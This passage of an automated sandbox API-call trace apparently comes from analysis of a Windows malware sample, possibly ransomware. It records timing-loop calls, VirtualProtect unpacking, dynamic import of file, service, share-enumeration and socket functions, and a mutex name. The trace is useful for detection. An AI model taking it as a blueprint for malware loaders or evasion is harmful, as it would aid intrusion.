x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x4b\x7a\x38\x25\x9c\xfe\x18", lpUsedDefaultChar=0x0) returned 256 [0238.074] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x42b272) returned 0x0 [0238.075] RtlSizeHeap (HeapHandle=0x2440000, Flags=0x0, MemoryPointer=0x2442af8) returned 0x80 [0238.159] RtlSizeHeap (HeapHandle=0x2440000, Flags=0x0, MemoryPointer=0x2442af8) returned 0x80 [0238.160] RtlSizeHeap (HeapHandle=0x2440000, Flags=0x0, MemoryPointer=0x2442af8) returned 0x80 [0238.160] RtlSizeHeap (HeapHandle=0x2440000, Flags=0x0, MemoryPointer=0x2442af8) returned 0x80 [0238.160] RtlSizeHeap (HeapHandle=0x2440000, Flags=0x0, MemoryPointer=0x2442af8) returned 0x80 [0238.176] GetTickCount () returned 0x66dc [0238.176] GetTickCount () returned 0x66dc [0238.176] GetTickCount () returned 0x66dc [0238.176] GetTickCount () returned 0x66dc [0238.176] GetTickCount () returned 0x66dc [0238.176] GetTickCount () returned 0x66dc [0238.176] GetTickCount () returned 0x66dc [0238.176] GetTickCount () returned 0x66dc [0238.176] GetTickCount () returned 0x66dc [0238.177] GetTickCount () returned 0x66dc [0238.177] GetTickCount () returned 0x66dc [0238.177] GetTickCount () returned 0x66dc [0238.177] GetTickCount () returned 0x66dc [0238.177] GetTickCount () returned 0x66dc [0238.177] GetTickCount () returned 0x66dc [0238.177] GetTickCount () returned 0x66dc [0238.177] GetTickCount () returned 0x66dc [0238.177] GetTickCount () returned 0x66dc [0238.177] GetTickCount () returned 0x66dc [0238.177] GetTickCount () returned 0x66dc [0238.177] GetTickCount () returned 0x66dc [0238.177] GetTickCount () returned 0x66dc [0238.177] GetTickCount () returned 0x66dc [0238.177] GetTickCount () returned 0x66dc [0238.177] GetTickCount () returned 0x66dc [0238.177] GetTickCount () returned 0x66dc [0238.177] GetTickCount () returned 0x66dc [0238.177] GetTickCount () returned 0x66dc [0238.177] GetTickCount () returned 0x66dc [0238.177] GetTickCount () returned 0x66dc [0238.177] GetTickCount () returned 0x66dc [0238.177] GetTickCount () returned 0x66dc [0238.177] GetTickCount () returned 0x66dc [0238.177] GetTickCount () returned 0x66dc [0238.177] GetTickCount () returned 0x66dc [0238.177] GetTickCount () returned 0x66dc [0238.177] GetTickCount () returned 0x66dc [0238.177] GetTickCount () returned 0x66dc [0238.177] GetTickCount () returned 0x66dc [0238.177] GetTickCount () returned 0x66dc [0238.177] GetTickCount () returned 0x66dc [0238.177] GetTickCount () returned 0x66dc [0238.177] GetTickCount () returned 0x66dc [0238.177] GetTickCount () returned 0x66dc [0238.177] GetTickCount () returned 0x66dc [0238.177] GetTickCount () returned 0x66dc [0238.177] GetTickCount () returned 0x66dc [0238.177] GetTickCount () returned 0x66dc [0238.177] GetTickCount () returned 0x66dc [0238.177] GetTickCount () returned 0x66dc [0238.177] GetTickCount () returned 0x66dc [0238.177] GetTickCount () returned 0x66dc [0238.177] GetTickCount () returned 0x66dc [0238.177] GetTickCount () returned 0x66dc [0238.178] GetTickCount () returned 0x66dc [0238.178] GetTickCount () returned 0x66dc [0238.178] GetTickCount () returned 0x66dc [0238.178] GetTickCount () returned 0x66dc [0238.178] GetTickCount () returned 0x66dc [0238.178] GetTickCount () returned 0x66dc [0238.178] GetTickCount () returned 0x66dc [0238.178] GetTickCount () returned 0x66dc [0238.178] GetTickCount () returned 0x66dc [0238.178] GetTickCount () returned 0x66dc [0238.178] GetTickCount () returned 0x66dc [0238.178] GetTickCount () returned 0x66dc [0238.178] GetTickCount () returned 0x66dc [0238.178] GetTickCount () returned 0x66dc [0238.178] GetTickCount () returned 0x66dc [0238.178] GetTickCount () returned 0x66dc [0238.178] GetTickCount () returned 0x66dc [0238.178] GetTickCount () returned 0x66dc [0238.178] GetTickCount () returned 0x66dc [0238.178] GetTickCount () returned 0x66dc [0238.178] GetTickCount () returned 0x66dc [0238.178] GetTickCount () returned 0x66dc [0238.178] GetTickCount () returned 0x66dc [0238.178] GetTickCount () returned 0x66dc [0238.178] GetTickCount () returned 0x66dc [0238.178] GetTickCount () returned 0x66dc [0238.178] GetTickCount () returned 0x66dc [0238.178] GetTickCount () returned 0x66dc [0238.178] GetTickCount () returned 0x66dc [0238.178] GetTickCount () returned 0x66dc [0238.178] GetTickCount () returned 0x66dc [0238.178] GetTickCount () returned 0x66dc [0238.178] GetTickCount () returned 0x66dc [0238.178] GetTickCount () returned 0x66dc [0238.178] GetTickCount () returned 0x66dc [0238.178] GetTickCount () returned 0x66dc [0238.178] GetTickCount () returned 0x66dc [0238.178] GetTickCount () returned 0x66dc [0238.178] GetTickCount () returned 0x66dc [0238.178] GetTickCount () returned 0x66dc [0238.178] GetTickCount () returned 0x66dc [0238.178] GetTickCount () returned 0x66dc [0238.178] GetTickCount () returned 0x66dc [0238.178] GetTickCount () returned 0x66dc [0238.178] GetTickCount () returned 0x66dc [0238.179] GetTickCount () returned 0x66dc [0238.179] GetTickCount () returned 0x66dc [0238.179] GetTickCount () returned 0x66dc [0238.179] GetTickCount () returned 0x66dc [0238.179] GetTickCount () returned 0x66dc [0238.179] GetTickCount () returned 0x66dc [0238.179] GetTickCount () returned 0x66dc [0238.179] GetTickCount () returned 0x66dc [0238.179] GetTickCount () returned 0x66dc [0238.179] GetTickCount () returned 0x66dc [0238.179] GetTickCount () returned 0x66dc [0238.179] GetTickCount () returned 0x66dc [0238.179] GetTickCount () returned 0x66dc [0238.179] GetTickCount () returned 0x66dc [0238.179] GetTickCount () returned 0x66dc [0238.179] GetTickCount () returned 0x66dc [0238.179] GetTickCount () returned 0x66dc [0238.179] GetTickCount () returned 0x66dc [0238.179] GetTickCount () returned 0x66dc [0238.179] GetTickCount () returned 0x66dc [0238.179] GetTickCount () returned 0x66dc [0238.179] GetTickCount () returned 0x66dc [0238.179] GetTickCount () returned 0x66dc [0238.179] GetTickCount () returned 0x66dc [0238.179] GetTickCount () returned 0x66dc [0238.179] GetTickCount () returned 0x66dc [0238.179] GetTickCount () returned 0x66dc [0238.179] GetTickCount () returned 0x66dc [0238.179] GetTickCount () returned 0x66dc [0238.179] GetTickCount () returned 0x66dc [0238.179] GetTickCount () returned 0x66dc [0238.179] GetTickCount () returned 0x66dc [0238.179] GetTickCount () returned 0x66dc [0238.179] GetTickCount () returned 0x66dc [0238.179] GetTickCount () returned 0x66dc [0238.179] GetTickCount () returned 0x66dc [0238.179] GetTickCount () returned 0x66dc [0238.179] GetTickCount () returned 0x66dc [0238.179] GetTickCount () returned 0x66dc [0238.179] GetTickCount () returned 0x66dc [0238.179] GetTickCount () returned 0x66dc [0238.179] GetTickCount () returned 0x66dc [0238.179] GetTickCount () returned 0x66dc [0238.179] GetTickCount () returned 0x66dc [0238.180] GetTickCount () returned 0x66dc [0238.180] GetTickCount () returned 0x66dc [0238.180] GetTickCount () returned 0x66dc [0238.180] GetTickCount () returned 0x66dc [0238.180] GetTickCount () returned 0x66dc [0238.180] GetTickCount () returned 0x66dc [0238.180] GetTickCount () returned 0x66dc [0238.180] GetTickCount () returned 0x66dc [0238.180] GetTickCount () returned 0x66dc [0238.180] GetTickCount () returned 0x66dc [0238.180] GetTickCount () returned 0x66dc [0238.180] GetTickCount () returned 0x66dc [0238.180] GetTickCount () returned 0x66dc [0238.180] GetTickCount () returned 0x66dc [0238.180] GetTickCount () returned 0x66dc [0238.180] GetTickCount () returned 0x66dc [0238.180] GetTickCount () returned 0x66dc [0238.180] GetTickCount () returned 0x66dc [0238.180] GetTickCount () returned 0x66dc [0238.180] GetTickCount () returned 0x66dc [0238.180] GetTickCount () returned 0x66dc [0238.180] GetTickCount () returned 0x66dc [0238.180] GetTickCount () returned 0x66dc [0238.180] GetTickCount () returned 0x66dc [0238.180] GetTickCount () returned 0x66dc [0238.180] GetTickCount () returned 0x66dc [0238.180] GetTickCount () returned 0x66dc [0238.180] GetTickCount () returned 0x66dc [0238.180] GetTickCount () returned 0x66dc [0238.180] GetTickCount () returned 0x66dc [0238.180] GetTickCount () returned 0x66dc [0238.180] GetTickCount () returned 0x66dc [0238.180] GetTickCount () returned 0x66dc [0238.180] GetTickCount () returned 0x66dc [0238.180] GetTickCount () returned 0x66dc [0238.180] GetTickCount () returned 0x66dc [0238.180] GetTickCount () returned 0x66dc [0238.180] GetTickCount () returned 0x66dc [0238.180] GetTickCount () returned 0x66dc [0238.180] GetTickCount () returned 0x66dc [0238.180] GetTickCount () returned 0x66dc [0238.180] GetTickCount () returned 0x66dc [0238.180] GetTickCount () returned 0x66dc [0238.180] GetTickCount () returned 0x66dc [0238.181] GetTickCount () returned 0x66dc [0238.181] GetTickCount () returned 0x66dc [0238.181] GetTickCount () returned 0x66dc [0238.181] GetTickCount () returned 0x66dc [0238.181] GetTickCount () returned 0x66dc [0238.181] GetTickCount () returned 0x66dc [0238.181] GetTickCount () returned 0x66dc [0238.181] GetTickCount () returned 0x66dc [0238.181] GetTickCount () returned 0x66dc [0238.181] GetTickCount () returned 0x66dc [0238.181] GetTickCount () returned 0x66dc [0238.181] GetTickCount () returned 0x66dc [0238.181] GetTickCount () returned 0x66dc [0238.181] GetTickCount () returned 0x66dc [0238.181] GetTickCount () returned 0x66dc [0238.181] GetTickCount () returned 0x66dc [0238.181] GetTickCount () returned 0x66dc [0238.181] GetTickCount () returned 0x66dc [0238.181] GetTickCount () returned 0x66dc [0238.181] GetTickCount () returned 0x66dc [0238.181] GetTickCount () returned 0x66dc [0238.181] GetTickCount () returned 0x66dc [0238.181] GetTickCount () returned 0x66dc [0238.181] GetTickCount () returned 0x66dc [0238.181] GetTickCount () returned 0x66dc [0238.181] GetTickCount () returned 0x66dc [0238.181] GetTickCount () returned 0x66dc [0238.181] GetTickCount () returned 0x66dc [0238.181] GetTickCount () returned 0x66dc [0238.181] GetTickCount () returned 0x66dc [0238.181] GetTickCount () returned 0x66dc [0238.181] GetTickCount () returned 0x66dc [0238.181] GetTickCount () returned 0x66dc [0238.181] GetTickCount () returned 0x66dc [0238.181] GetTickCount () returned 0x66dc [0238.181] GetTickCount () returned 0x66dc [0238.181] GetTickCount () returned 0x66dc [0238.181] GetTickCount () returned 0x66dc [0238.181] GetTickCount () returned 0x66dc [0238.181] GetTickCount () returned 0x66dc [0238.181] GetTickCount () returned 0x66dc [0238.181] GetTickCount () returned 0x66dc [0238.181] GetTickCount () returned 0x66dc [0238.181] GetTickCount () returned 0x66dc [0238.181] GetTickCount () returned 0x66dc [0238.181] GetTickCount () returned 0x66dc [0238.182] GetTickCount () returned 0x66dc [0238.182] GetTickCount () returned 0x66dc [0238.182] GetTickCount () returned 0x66dc [0238.182] GetTickCount () returned 0x66dc [0238.182] GetTickCount () returned 0x66dc [0238.182] GetTickCount () returned 0x66dc [0238.182] GetTickCount () returned 0x66dc [0238.182] GetTickCount () returned 0x66dc [0238.182] GetTickCount () returned 0x66dc [0238.182] GetTickCount () returned 0x66dc [0238.182] GetTickCount () returned 0x66dc [0238.182] GetTickCount () returned 0x66dc [0238.182] GetTickCount () returned 0x66dc [0238.182] GetTickCount () returned 0x66dc [0238.182] GetTickCount () returned 0x66dc [0238.182] GetTickCount () returned 0x66dc [0238.776] LocalAlloc (uFlags=0x0, uBytes=0x17e50) returned 0xac2268 [0238.777] LocalAlloc (uFlags=0x0, uBytes=0x17e50) returned 0xada0c0 [0239.465] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a00000 [0239.465] GetProcAddress (hModule=0x75a00000, lpProcName="GlobalAlloc") returned 0x75a1588e [0239.468] lstrcpyA (in: lpString1=0x450090, lpString2="Virtual" | out: lpString1="Virtual") returned="Virtual" [0239.622] lstrcatA (in: lpString1="Virtual", lpString2="Protect" | out: lpString1="VirtualProtect") returned="VirtualProtect" [0239.622] GetProcAddress (hModule=0x75a00000, lpProcName="VirtualProtect") returned 0x75a1435f [0239.623] VirtualProtect (in: lpAddress=0xaf1f18, dwSize=0x11ebc, flNewProtect=0x40, lpflOldProtect=0x18f6c0 | out: lpflOldProtect=0x18f6c0*=0x4) returned 1 [0239.630] GetProcAddress (hModule=0x75a00000, lpProcName="LoadLibraryA") returned 0x75a149d7 [0239.630] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75a00000 [0239.630] GetProcAddress (hModule=0x75a00000, lpProcName="VirtualAlloc") returned 0x75a11856 [0239.630] GetProcAddress (hModule=0x75a00000, lpProcName="VirtualProtect") returned 0x75a1435f [0239.630] GetProcAddress (hModule=0x75a00000, lpProcName="VirtualFree") returned 0x75a1186e [0239.630] GetProcAddress (hModule=0x75a00000, lpProcName="GetVersionExA") returned 0x75a13519 [0239.630] GetProcAddress (hModule=0x75a00000, lpProcName="TerminateProcess") returned 0x75a2d802 [0239.630] GetProcAddress (hModule=0x75a00000, lpProcName="ExitProcess") returned 0x75a17a10 [0239.630] GetProcAddress (hModule=0x75a00000, lpProcName="SetErrorMode") returned 0x75a11b00 [0239.630] SetErrorMode (uMode=0x400) returned 0x0 [0239.630] SetErrorMode (uMode=0x0) returned 0x400 [0239.630] GetVersionExA (in: lpVersionInformation=0x18ee4c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x2, dwPlatformId=0xffffffff, szCSDVersion="s}Dw") | out: lpVersionInformation=0x18ee4c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0239.630] VirtualAlloc (lpAddress=0x0, dwSize=0x17200, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0239.632] VirtualProtect (in: lpAddress=0x400000, dwSize=0x19000, flNewProtect=0x40, lpflOldProtect=0x18fed4 | out: lpflOldProtect=0x18fed4*=0x2) returned 1 [0239.788] VirtualFree (lpAddress=0x210000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0239.789] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x75a00000 [0239.789] GetProcAddress (hModule=0x75a00000, lpProcName="GetProcAddress") returned 0x75a11222 [0239.789] GetProcAddress (hModule=0x75a00000, lpProcName="LoadLibraryA") returned 0x75a149d7 [0239.789] GetProcAddress (hModule=0x75a00000, lpProcName="WaitForSingleObject") returned 0x75a11136 [0239.789] GetProcAddress (hModule=0x75a00000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x75a11916 [0239.789] GetProcAddress (hModule=0x75a00000, lpProcName="LeaveCriticalSection") returned 0x77432270 [0239.790] GetProcAddress (hModule=0x75a00000, lpProcName="GetLastError") returned 0x75a111c0 [0239.790] GetProcAddress (hModule=0x75a00000, lpProcName="EnterCriticalSection") returned 0x774322b0 [0239.790] GetProcAddress (hModule=0x75a00000, lpProcName="ReleaseMutex") returned 0x75a1111e [0239.790] GetProcAddress (hModule=0x75a00000, lpProcName="CloseHandle") returned 0x75a11410 [0239.790] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x73260000 [0239.952] GetProcAddress (hModule=0x73260000, lpProcName="atexit") returned 0x7327c544 [0239.952] atexit (param_1=0xaf2838) returned 0 [0239.953] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75a00000 [0239.953] GetProcAddress (hModule=0x75a00000, lpProcName="GetProcAddress") returned 0x75a11222 [0239.953] GetProcAddress (hModule=0x75a00000, lpProcName="GetModuleHandleW") returned 0x75a134b0 [0239.953] GetProcAddress (hModule=0x75a00000, lpProcName="FindNextFileW") returned 0x75a154ee [0239.953] GetProcAddress (hModule=0x75a00000, lpProcName="FindClose") returned 0x75a14442 [0239.953] GetProcAddress (hModule=0x75a00000, lpProcName="MoveFileW") returned 0x75a29af0 [0239.953] GetProcAddress (hModule=0x75a00000, lpProcName="GetFileSizeEx") returned 0x75a159e2 [0239.953] GetProcAddress (hModule=0x75a00000, lpProcName="GetModuleFileNameW") returned 0x75a14950 [0239.953] GetProcAddress (hModule=0x75a00000, lpProcName="GetFileAttributesW") returned 0x75a11b18 [0239.953] GetProcAddress (hModule=0x75a00000, lpProcName="ExitProcess") returned 0x75a17a10 [0239.953] GetProcAddress (hModule=0x75a00000, lpProcName="GetCommandLineW") returned 0x75a15223 [0239.953] GetProcAddress (hModule=0x75a00000, lpProcName="GetComputerNameW") returned 0x75a1dd0e [0239.953] GetProcAddress (hModule=0x75a00000, lpProcName="GetComputerNameA") returned 0x75a2b6e0 [0239.953] GetProcAddress (hModule=0x75a00000, lpProcName="CreateMutexW") returned 0x75a1424c [0239.954] GetProcAddress (hModule=0x75a00000, lpProcName="lstrlenW") returned 0x75a11700 [0239.954] GetProcAddress (hModule=0x75a00000, lpProcName="lstrlenA") returned 0x75a15a4b [0239.954] GetProcAddress (hModule=0x75a00000, lpProcName="GetCurrentProcess") returned 0x75a11809 [0239.954] GetProcAddress (hModule=0x75a00000, lpProcName="WaitForSingleObject") returned 0x75a11136 [0239.954] GetProcAddress (hModule=0x75a00000, lpProcName="GetLogicalDrives") returned 0x75a15371 [0239.954] GetProcAddress (hModule=0x75a00000, lpProcName="GetTickCount") returned 0x75a1110c [0239.954] GetProcAddress (hModule=0x75a00000, lpProcName="DeleteFileW") returned 0x75a189b3 [0239.954] GetProcAddress (hModule=0x75a00000, lpProcName="WideCharToMultiByte") returned 0x75a1170d [0239.954] GetProcAddress (hModule=0x75a00000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x75a11916 [0239.954] GetProcAddress (hModule=0x75a00000, lpProcName="Sleep") returned 0x75a110ff [0239.954] GetProcAddress (hModule=0x75a00000, lpProcName="LeaveCriticalSection") returned 0x77432270 [0239.954] GetProcAddress (hModule=0x75a00000, lpProcName="ReadFile") returned 0x75a13ed3 [0239.954] GetProcAddress (hModule=0x75a00000, lpProcName="CreateFileW") returned 0x75a13f5c [0239.954] GetProcAddress (hModule=0x75a00000, lpProcName="OpenMutexW") returned 0x75a15151 [0239.954] GetProcAddress (hModule=0x75a00000, lpProcName="EnterCriticalSection") returned 0x774322b0 [0239.955] GetProcAddress (hModule=0x75a00000, lpProcName="WaitForMultipleObjects") returned 0x75a14220 [0239.955] GetProcAddress (hModule=0x75a00000, lpProcName="lstrcmpiW") returned 0x75a2d5cd [0239.955] GetProcAddress (hModule=0x75a00000, lpProcName="lstrcmpiA") returned 0x75a13e8e [0239.955] GetProcAddress (hModule=0x75a00000, lpProcName="DeleteCriticalSection") returned 0x774445f5 [0239.955] GetProcAddress (hModule=0x75a00000, lpProcName="ReleaseMutex") returned 0x75a1111e [0239.955] GetProcAddress (hModule=0x75a00000, lpProcName="CloseHandle") returned 0x75a11410 [0239.955] GetProcAddress (hModule=0x75a00000, lpProcName="GetVersion") returned 0x75a14467 [0239.955] GetProcAddress (hModule=0x75a00000, lpProcName="CreateThread") returned 0x75a134d5 [0239.955] GetProcAddress (hModule=0x75a00000, lpProcName="ExpandEnvironmentStringsW") returned 0x75a14173 [0239.955] GetProcAddress (hModule=0x75a00000, lpProcName="QueryPerformanceCounter") returned 0x75a11725 [0239.955] GetProcAddress (hModule=0x75a00000, lpProcName="QueryPerformanceFrequency") returned 0x75a141f0 [0239.955] GetProcAddress (hModule=0x75a00000, lpProcName="GetCurrentProcessId") returned 0x75a111f8 [0239.955] GetProcAddress (hModule=0x75a00000, lpProcName="SetFileAttributesW") returned 0x75a2d4f7 [0239.955] GetProcAddress (hModule=0x75a00000, lpProcName="GetVolumeInformationW") returned 0x75a2c860 [0239.955] GetProcAddress (hModule=0x75a00000, lpProcName="WriteFile") returned 0x75a11282 [0239.956] GetProcAddress (hModule=0x75a00000, lpProcName="SetFilePointerEx") returned 0x75a2c807 [0239.956] GetProcAddress (hModule=0x75a00000, lpProcName="SetEndOfFile") returned 0x75a2ce2e [0239.956] GetProcAddress (hModule=0x75a00000, lpProcName="FindFirstFileW") returned 0x75a14435 [0239.956] GetProcAddress (hModule=0x75a00000, lpProcName="GetProcessHeap") returned 0x75a114e9 [0239.956] GetProcAddress (hModule=0x75a00000, lpProcName="HeapReAlloc") returned 0x77451f6e [0239.956] GetProcAddress (hModule=0x75a00000, lpProcName="HeapAlloc") returned 0x7743e026 [0239.956] GetProcAddress (hModule=0x75a00000, lpProcName="HeapFree") returned 0x75a114c9 [0239.956] GetProcAddress (hModule=0x75a00000, lpProcName="CreatePipe") returned 0x75a9415b [0239.956] GetProcAddress (hModule=0x75a00000, lpProcName="SetHandleInformation") returned 0x75a2195c [0239.956] GetProcAddress (hModule=0x75a00000, lpProcName="CreateProcessW") returned 0x75a1103d [0239.956] GetProcAddress (hModule=0x75a00000, lpProcName="CompareStringW") returned 0x75a13bca [0239.956] GetProcAddress (hModule=0x75a00000, lpProcName="CompareStringA") returned 0x75a13c5a [0239.956] GetProcAddress (hModule=0x75a00000, lpProcName="OpenProcess") returned 0x75a11986 [0239.956] GetProcAddress (hModule=0x75a00000, lpProcName="TerminateProcess") returned 0x75a2d802 [0239.956] GetProcAddress (hModule=0x75a00000, lpProcName="GetSystemTime") returned 0x75a15a96 [0239.956] GetProcAddress (hModule=0x75a00000, lpProcName="SystemTimeToFileTime") returned 0x75a15a7e [0239.957] GetProcAddress (hModule=0x75a00000, lpProcName="GetLastError") returned 0x75a111c0 [0239.957] GetProcAddress (hModule=0x75a00000, lpProcName="CreateToolhelp32Snapshot") returned 0x75a3735f [0239.957] GetProcAddress (hModule=0x75a00000, lpProcName="Process32NextW") returned 0x75a3896c [0239.957] GetProcAddress (hModule=0x75a00000, lpProcName="Process32FirstW") returned 0x75a38baf [0239.957] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x74fd0000 [0239.957] GetProcAddress (hModule=0x74fd0000, lpProcName="RegOpenKeyExW") returned 0x74fe468d [0239.957] GetProcAddress (hModule=0x74fd0000, lpProcName="RegQueryValueExW") returned 0x74fe46ad [0239.957] GetProcAddress (hModule=0x74fd0000, lpProcName="RegSetValueExW") returned 0x74fe14d6 [0239.957] GetProcAddress (hModule=0x74fd0000, lpProcName="RegCloseKey") returned 0x74fe469d [0239.957] GetProcAddress (hModule=0x74fd0000, lpProcName="OpenProcessToken") returned 0x74fe4304 [0239.957] GetProcAddress (hModule=0x74fd0000, lpProcName="GetTokenInformation") returned 0x74fe431c [0239.957] GetProcAddress (hModule=0x74fd0000, lpProcName="OpenSCManagerW") returned 0x74fdca64 [0239.957] GetProcAddress (hModule=0x74fd0000, lpProcName="OpenServiceW") returned 0x74fdca4c [0239.957] GetProcAddress (hModule=0x74fd0000, lpProcName="CloseServiceHandle") returned 0x74fe369c [0239.957] GetProcAddress (hModule=0x74fd0000, lpProcName="ControlService") returned 0x74ff7144 [0239.957] GetProcAddress (hModule=0x74fd0000, lpProcName="QueryServiceStatus") returned 0x74fe2a86 [0239.958] GetProcAddress (hModule=0x74fd0000, lpProcName="EnumDependentServicesW") returned 0x74fd1e3a [0239.958] GetProcAddress (hModule=0x74fd0000, lpProcName="EnumServicesStatusExW") returned 0x74fdb466 [0239.958] LoadLibraryA (lpLibFileName="user32.dll") returned 0x75f80000 [0239.958] GetProcAddress (hModule=0x75f80000, lpProcName="SystemParametersInfoW") returned 0x75f990d3 [0239.958] LoadLibraryA (lpLibFileName="Shell32.dll") returned 0x76260000 [0239.961] GetProcAddress (hModule=0x76260000, lpProcName="ShellExecuteExW") returned 0x76281e46 [0239.961] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77410000 [0239.961] GetProcAddress (hModule=0x77410000, lpProcName="NtQuerySystemInformation") returned 0x7742fda0 [0239.961] LoadLibraryA (lpLibFileName="mpr.dll") returned 0x73220000 [0239.962] GetProcAddress (hModule=0x73220000, lpProcName="WNetCloseEnum") returned 0x73222dd6 [0239.962] GetProcAddress (hModule=0x73220000, lpProcName="WNetOpenEnumW") returned 0x73222f06 [0239.962] GetProcAddress (hModule=0x73220000, lpProcName="WNetEnumResourceW") returned 0x73223058 [0239.962] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x76fd0000 [0239.963] GetProcAddress (hModule=0x76fd0000, lpProcName="WSAStartup") returned 0x76fd3ab2 [0239.964] GetProcAddress (hModule=0x76fd0000, lpProcName="socket") returned 0x76fd3eb8 [0239.964] GetProcAddress (hModule=0x76fd0000, lpProcName="send") returned 0x76fd6f01 [0239.964] GetProcAddress (hModule=0x76fd0000, lpProcName="recv") returned 0x76fd6b0e [0239.964] GetProcAddress (hModule=0x76fd0000, lpProcName="connect") returned 0x76fd6bdd [0239.964] GetProcAddress (hModule=0x76fd0000, lpProcName="closesocket") returned 0x76fd3918 [0239.964] GetProcAddress (hModule=0x76fd0000, lpProcName="gethostbyname") returned 0x76fe7673 [0239.964] GetProcAddress (hModule=0x76fd0000, lpProcName="inet_addr") returned 0x76fd311b [0239.964] GetProcAddress (hModule=0x76fd0000, lpProcName="ntohl") returned 0x76fd2d57 [0239.964] GetProcAddress (hModule=0x76fd0000, lpProcName="htonl") returned 0x76fd2d57 [0239.964] GetProcAddress (hModule=0x76fd0000, lpProcName="htons") returned 0x76fd2d8b [0239.964] GetProcessHeap () returned 0xab0000 [0239.964] RtlAllocateHeap (HeapHandle=0xab0000, Flags=0x0, Size=0x20) returned 0xb0ccd0 [0239.964] QueryPerformanceCounter (in: lpPerformanceCount=0x18fd24 | out: lpPerformanceCount=0x18fd24*=7162613409) returned 1 [0239.964] GetTickCount () returned 0x6dde [0239.964] GetCurrentProcessId () returned 0x554 [0239.965] GetTickCount () returned 0x6dde [0239.965] GetTickCount () returned 0x6dde [0239.965] RtlAllocateHeap (HeapHandle=0xab0000, Flags=0x0, Size=0x20) returned 0xb0ccf8 [0239.965] GetVersion () returned 0x1db10106 [0239.965] RtlAllocateHeap (HeapHandle=0xab0000, Flags=0x0, Size=0x7) returned 0xb09df0 [0239.965] RtlAllocateHeap (HeapHandle=0xab0000, Flags=0x0, Size=0x10) returned 0xac0b88 [0239.965] RtlReAllocateHeap (Heap=0xab0000, Flags=0x0, Ptr=0xac0b88, Size=0x20) returned 0xb0cd48 [0239.965] RtlReAllocateHeap (Heap=0xab0000, Flags=0x0, Ptr=0xb0cd48, Size=0x40) returned 0xb0c8d8 [0239.965] RtlAllocateHeap (HeapHandle=0xab0000, Flags=0x0, Size=0xfffe) returned 0xb0d350 [0239.965] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\syncronize_ZD24L0A") returned 0x84 [0239.965] HeapFree (in: hHeap=0xab0000, dwFlags=0x0, lpMem=0xb09df0 | out: hHeap=0xab0000) returned 1 [0239.965] lstrlenW (lpString="Global\\syncronize_") returned 18 [0239.965] 